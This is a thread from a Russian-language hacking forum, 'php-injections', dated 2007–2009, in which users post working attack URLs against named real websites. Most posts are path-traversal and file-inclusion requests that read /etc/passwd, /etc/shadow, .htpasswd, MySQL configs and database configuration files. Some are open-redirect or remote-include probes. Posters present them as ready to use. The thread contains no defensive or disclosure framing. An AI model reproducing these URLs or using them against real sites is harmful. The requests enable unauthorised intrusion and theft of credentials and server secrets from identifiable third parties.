1. Пост двух одинаковых тем в разных разделах - бан.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

php- иньекции

Тема в разделе "Поиск уязвимостей", создана пользователем Constantine, 8 май 2007.

  1. Хел
    Хел Новичок
    Симпатии:
    147
    Код:
    http://www.uml.edu.ua/index.php?page=../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
     
    25 ноя 2007
  2. GettoLove
    GettoLove Продвинутый
    Симпатии:
    34
    Код:
    http://www.kmb.hk/english.php?page=search&prog=../../../../etc/passwd
    Код:
    http://www.novum-polska.pl/_dodruku.php?incfile=../../../../../../../usr/local/apache/conf/httpd.conf
    Код:
    http://www.script.com.ua/dev/materials.php?id=../../../../../../etc/passwd
    http://trapeza.com.ua/_dp/view2.php?file=../../../../etc/shadow
    http://www.automuna.com.ua/html/static.php?file=../../../../../etc/passwd
    
     
    Последнее редактирование: 21 янв 2008
    2 янв 2008
  3. Burt
    Burt Новичок
    Симпатии:
    3
    Код:
    http://www.kvikhalden.no/start.asp?url=http://xaker.name/&lag=1
     
    15 июл 2008
    2 пользователям это понравилось.
  4. ~!Dok_tOR!~
    ~!Dok_tOR!~ Продвинутый
    Симпатии:
    23
    Код:
    http://www.cirkel.de/ibase/zubehoer/download.php?filename=../config/config_db.php
    http://www.i-ped.de/ibase/zubehoer/download.php?filename=../config/config_db.php
    http://www.motorrad-guenther.de/ibase/zubehoer/download.php?filename=../config/config_db.php
    http://www.calorplast.de/ibase/zubehoer/download.php?filename=../config/config_db.php
    
     
    26 июл 2008
  5. Anvil
    Anvil Мягкий и пушистый! Новичок
    Симпатии:
    30
    Из той же серии:
    Код:
    http://www.car-parts-kuhn.de/ibase/zubehoer/download.php?filename=../config/config_db.php
    http://www.trinx.info/ibase/zubehoer/%20download.php?filename=../config/config_db.php
    http://www.sportcollege.de/ibase/zubehoer/download.php?filename=../config/config_db.php
    http://www.liscop.com/ibase/zubehoer/download.php?filename=../config/config_db.php
    http://www.medienbinder.de/ibase/zubehoer/download.php?filename=../config/config_db.php
    http://www.suk-awd.de/ibase/zubehoer/download.php?filename=../config/config_db.php
    http://www.cpk-automotive.com/ibase/zubehoer/download.php?filename=../config/config_db.php
    
     
    26 июл 2008
    1 человеку нравится это.
  6. ~!Dok_tOR!~
    ~!Dok_tOR!~ Продвинутый
    Симпатии:
    23
    Код:
    http://www.extramebel.ru/install/update/install.php?SysValue[file][error]=../../../../etc/passwd
    http://www.extramebel.ru/install/update/install.php?SysValue[file][error]=/phpshop/inc/config.ini
    
    
     
    28 июл 2008
  7. =<4APAEV>=
    =<4APAEV>= Новичок
    Симпатии:
    24
    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 30 or greater.**
     
    Последнее редактирование: 16 авг 2008
    1 авг 2008
  8. vitamix
    vitamix Новичок
    Симпатии:
    0
    5 авг 2008
  9. =<4APAEV>=
    =<4APAEV>= Новичок
    Симпатии:
    24
    Код:
    http://www.paintballgame.cz/english/index.php?left=http://xaker.name
    http://www.paintballgame.cz/english/index.php?left=http://xaker.name&mainpage=http://xaker.name&down=http://xaker.name
     
    Последнее редактирование: 16 авг 2008
    16 авг 2008
  10. xeran
    xeran Продвинутый
    Симпатии:
    31
    Разгребал мусор на компе, наткнулся на несколько рабочих инжектов.
    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 30 or greater.**
    юзаем на здоровье
     
    13 сен 2008
    1 человеку нравится это.
  11. NetSky
    NetSky адепт Модератор
    Симпатии:
    84
    Код:
    http://www.hc-avto.ru/?dir=../.htpasswd
    http://www.hc-avto.ru/?dir=.htaccess
    http://www.hc-avto.ru/?dir=../../../../etc/passwd
    МСКл конфиг нашел с помощью своего скрипта
    Код:
    http://www.hc-avto.ru/?dir=../../../../etc/mysql/my.cnf
     
    14 сен 2008
    1 человеку нравится это.
  12. NetSky
    NetSky адепт Модератор
    Симпатии:
    84
    Хех, в теме в разделе соц. инж. ссылочку на тест выложли, без левой мысли перешол, по тестикам поклацал, удивил запрос в ссылке, я по привычке..., но при измении параметра ничего особого не вылазило, кроме небольшой надписи красным "can't load file" на фоне новости... копнул глубже...
    Позже попробую найти и заинклудить логи...

    Код:
    http://test.msk.ru/cgi-bin/razdel.cgi?../../../../etc/passwd%00
    Добавлено через 2 часа 10 минут
    Хопля, вот и попались дядьки, уязвимость равноценна команде "ls-la" и даже пожещще...
    Код:
    http://test.msk.ru/cgi-bin/razdel.cgi?../../../../usr/local/www/postfixadmin%00
     
    Последнее редактирование: 23 сен 2008
    23 сен 2008
    1 человеку нравится это.
  13. faza02
    faza02 Никто Новичок
    Симпатии:
    58
    Код:
    http://www.dentalhealth.org.uk/index.php?w=../../../../../../etc/passwd%00
    Код:
    http://cartxpress.info/catalog/filemanager.php?file=../../../../../../../../etc/passwd
     
    20 дек 2008
  14. xeran
    xeran Продвинутый
    Симпатии:
    31
    Код:
    http://www.talk1410.com/shows.php?p=../../../etc/passwd
     
    21 дек 2008
  15. Hookman
    Hookman Developer Глобальный модератор
    Симпатии:
    202
    Код:
    http://www.jedit.org/index.php?page=../../../../../../../../../etc/passwd%00


    Добавлено через 8 часов 32 минуты
    Код:
    http://www.waza.org/ethics/index.php?main=ethics&view=../../../../../etc/passwd%00
    Добавлено через 8 часов 43 минуты
    Код:
    http://www.aseanfoundation.org/index2.php?main=../../../../../../../etc/passwd
    Добавлено через 8 часов 49 минут
    Код:
    http://www.ict4dasean.org/index2.php?main=../../../../../etc/passwd
    Добавлено через 11 часов 6 минут
    Код:
    http://www.iphoneapps.ru/images/vpn/db.php?show=../../../../../../../../../../../etc/passwd
     
    Последнее редактирование: 25 янв 2009
    24 янв 2009
  16. NetSky
    NetSky адепт Модератор
    Симпатии:
    84
    Код:
    http://www.jedit.org/index.php?page=../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
    Код:
    http://www.serviceandinclusion.org/index.php?page=../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
     
    13 фев 2009
  17. faza02
    faza02 Никто Новичок
    Симпатии:
    58
    Код:
    http://www.peek.org/bryan/game/dnd.php?p=../../../../../../../../etc/passwd%00
     
    15 мар 2009
  18. Hookman
    Hookman Developer Глобальный модератор
    Симпатии:
    202
    Код:
    http://www.salonmechta.ru/view.php?page=../../../../../etc/passwd%00
     
    16 май 2009
  19. Hookman
    Hookman Developer Глобальный модератор
    Симпатии:
    202
    Код:
    http://www.cyclingnews.com/tech.php?id=../../../../etc/passwd%00
    PR 7 тиц 130
     
    Последнее редактирование: 22 май 2009
    21 май 2009
    1 человеку нравится это.
  20. Pin4eG
    Pin4eG Продвинутый
    Симпатии:
    33
    Код:
    http://unjust-enrichment.com/index.php?p=../../etc/passwd
    Код:
    http://starpioneers.co.uk/index.php?p=../../../../etc/passwd
    Код:
    http://archiv.warhog.net/legento/index.php?p=index.php
     
    27 май 2009
    1 человеку нравится это.

Поделиться этой страницей

Загрузка...